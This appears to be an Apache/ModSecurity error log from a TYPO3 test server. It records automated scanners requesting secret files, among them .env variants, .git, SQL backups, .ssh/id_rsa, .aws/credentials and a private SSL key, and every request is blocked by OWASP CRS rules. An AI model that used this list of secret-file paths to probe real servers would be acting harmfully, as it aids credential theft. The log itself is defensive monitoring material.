[Fri May 23 09:28:26.057295 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDAjmjp6LlXsYZigXAaylwAAAAk"]
[Fri May 23 09:28:26.077702 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aDAjmjp6LlXsYZigXAaymAAAAAk"]
[Fri May 23 09:28:26.077944 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aDAjmjp6LlXsYZigXAaymAAAAAk"]
[Fri May 23 09:28:26.078115 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aDAjmjp6LlXsYZigXAaymAAAAAk"]
[Fri May 23 09:28:26.098507 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aDAjmjp6LlXsYZigXAaymQAAAAk"]
[Fri May 23 09:28:26.098748 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aDAjmjp6LlXsYZigXAaymQAAAAk"]
[Fri May 23 09:28:26.098916 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aDAjmjp6LlXsYZigXAaymQAAAAk"]
[Fri May 23 09:28:26.119406 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aDAjmjp6LlXsYZigXAaymgAAAAk"]
[Fri May 23 09:28:26.119634 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aDAjmjp6LlXsYZigXAaymgAAAAk"]
[Fri May 23 09:28:26.119801 2025] [:error] [pid 3348252] [client 170.39.217.202:11344] [client 170.39.217.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aDAjmjp6LlXsYZigXAaymgAAAAk"]
[Fri May 23 09:28:26.139857 2025] [authz_core:error] [pid 3348252] [client 170.39.217.202:11344] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri May 23 09:36:22.794082 2025] [authz_core:error] [pid 3351881] [client 196.251.88.164:45096] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri May 23 21:10:24.551193 2025] [authz_core:error] [pid 3348266] [client 54.242.115.50:42624] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri May 23 23:43:25.301719 2025] [authz_core:error] [pid 3348064] [client 213.232.87.230:14635] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Fri May 23 23:43:25.304978 2025] [:error] [pid 3348252] [client 213.232.87.230:51639] [client 213.232.87.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDDr_Tp6LlXsYZigXAay5wAAAAk"]
[Fri May 23 23:43:25.306479 2025] [:error] [pid 3348252] [client 213.232.87.230:51639] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDDr_Tp6LlXsYZigXAay5wAAAAk"]
[Fri May 23 23:43:25.306630 2025] [:error] [pid 3348252] [client 213.232.87.230:51639] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDDr_Tp6LlXsYZigXAay5wAAAAk"]
[Fri May 23 23:43:25.305808 2025] [authz_core:error] [pid 3351872] [client 213.232.87.230:43101] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database_backup.sql
[Fri May 23 23:43:25.307522 2025] [:error] [pid 3348068] [client 213.232.87.230:46047] [client 213.232.87.230] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "aDDr_UBb2BWm6HdI_12zLwAAAAU"]
[Fri May 23 23:43:25.307689 2025] [:error] [pid 3348068] [client 213.232.87.230:46047] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "aDDr_UBb2BWm6HdI_12zLwAAAAU"]
[Fri May 23 23:43:25.307835 2025] [:error] [pid 3348068] [client 213.232.87.230:46047] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "aDDr_UBb2BWm6HdI_12zLwAAAAU"]
[Fri May 23 23:43:25.613283 2025] [authz_core:error] [pid 3348068] [client 213.232.87.230:56609] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloud-config.yml
[Fri May 23 23:43:25.614973 2025] [authz_core:error] [pid 3351872] [client 213.232.87.230:56239] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Fri May 23 23:43:25.661339 2025] [authz_core:error] [pid 3348130] [client 213.232.87.230:21237] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/user_secrets.yml
[Fri May 23 23:43:25.663490 2025] [:error] [pid 3348127] [client 213.232.87.230:11953] [client 213.232.87.230] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aDDr_aqpgh0zmDe7Q-Y0zAAAAAc"]
[Fri May 23 23:43:25.663801 2025] [:error] [pid 3348127] [client 213.232.87.230:11953] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aDDr_aqpgh0zmDe7Q-Y0zAAAAAc"]
[Fri May 23 23:43:25.663962 2025] [:error] [pid 3348127] [client 213.232.87.230:11953] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aDDr_aqpgh0zmDe7Q-Y0zAAAAAc"]
[Fri May 23 23:43:25.724714 2025] [:error] [pid 3348252] [client 213.232.87.230:10663] [client 213.232.87.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDDr_Tp6LlXsYZigXAay6AAAAAk"]
[Fri May 23 23:43:25.724931 2025] [:error] [pid 3348252] [client 213.232.87.230:10663] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDDr_Tp6LlXsYZigXAay6AAAAAk"]
[Fri May 23 23:43:25.725074 2025] [:error] [pid 3348252] [client 213.232.87.230:10663] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDDr_Tp6LlXsYZigXAay6AAAAAk"]
[Fri May 23 23:43:25.729883 2025] [:error] [pid 3348266] [client 213.232.87.230:13291] [client 213.232.87.230] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aDDr_cCfAEoI969JbKcJPwAAAAs"]
[Fri May 23 23:43:25.730009 2025] [:error] [pid 3348266] [client 213.232.87.230:13291] [client 213.232.87.230] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aDDr_cCfAEoI969JbKcJPwAAAAs"]
[Fri May 23 23:43:25.730186 2025] [:error] [pid 3348266] [client 213.232.87.230:13291] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aDDr_cCfAEoI969JbKcJPwAAAAs"]
[Fri May 23 23:43:25.730346 2025] [:error] [pid 3348266] [client 213.232.87.230:13291] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aDDr_cCfAEoI969JbKcJPwAAAAs"]
[Fri May 23 23:43:25.755518 2025] [authz_core:error] [pid 3348061] [client 213.232.87.230:24071] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Fri May 23 23:43:25.864603 2025] [:error] [pid 3351872] [client 213.232.87.230:52687] [client 213.232.87.230] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDDr_Zk7Vk06-GcnxMuGYwAAAAM"]
[Fri May 23 23:43:25.864820 2025] [:error] [pid 3351872] [client 213.232.87.230:52687] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDDr_Zk7Vk06-GcnxMuGYwAAAAM"]
[Fri May 23 23:43:25.864978 2025] [:error] [pid 3351872] [client 213.232.87.230:52687] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aDDr_Zk7Vk06-GcnxMuGYwAAAAM"]
[Fri May 23 23:43:25.923739 2025] [:error] [pid 3348068] [client 213.232.87.230:54793] [client 213.232.87.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aDDr_UBb2BWm6HdI_12zMQAAAAU"]
[Fri May 23 23:43:25.923989 2025] [:error] [pid 3348068] [client 213.232.87.230:54793] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aDDr_UBb2BWm6HdI_12zMQAAAAU"]
[Fri May 23 23:43:25.924146 2025] [:error] [pid 3348068] [client 213.232.87.230:54793] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aDDr_UBb2BWm6HdI_12zMQAAAAU"]
[Fri May 23 23:43:26.076801 2025] [authz_core:error] [pid 3367217] [client 213.232.87.230:59327] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Fri May 23 23:43:26.076941 2025] [authz_core:error] [pid 3348062] [client 213.232.87.230:46631] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Fri May 23 23:43:26.116161 2025] [authz_core:error] [pid 3348061] [client 213.232.87.230:16445] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Fri May 23 23:43:26.141238 2025] [:error] [pid 3348266] [client 213.232.87.230:36897] [client 213.232.87.230] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aDDr_sCfAEoI969JbKcJQAAAAAs"]
[Fri May 23 23:43:26.141387 2025] [:error] [pid 3348266] [client 213.232.87.230:36897] [client 213.232.87.230] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aDDr_sCfAEoI969JbKcJQAAAAAs"]
[Fri May 23 23:43:26.141622 2025] [:error] [pid 3348266] [client 213.232.87.230:36897] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aDDr_sCfAEoI969JbKcJQAAAAAs"]
